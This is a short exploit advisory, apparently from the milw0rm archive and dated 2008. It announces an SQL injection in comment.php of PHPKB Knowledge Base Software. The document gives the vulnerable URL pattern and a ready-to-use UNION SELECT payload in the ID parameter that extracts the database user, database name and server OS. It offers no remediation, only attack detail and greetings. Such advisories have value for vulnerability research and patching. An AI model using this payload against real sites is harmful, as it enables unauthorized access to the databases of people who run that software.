PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability ------------------------------------------------------------------------------------------------- # Author : parad0x # Home : www.inso.host.sk # Script : PHPKB Knowledge Base Software # Script Homepage : http://www.knowledgebase-script.com ------------------------------------------------------------------------------------------------- http://[target]/comment.php?ID=[SQL] ------------------------------------------------------------------------------------------------- Example: http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/* ------------------------------------------------------------------------------------------------- greetz : VoLqaN ------------------------------------------------------------------------------------------------- # milw0rm.com [2008-04-11]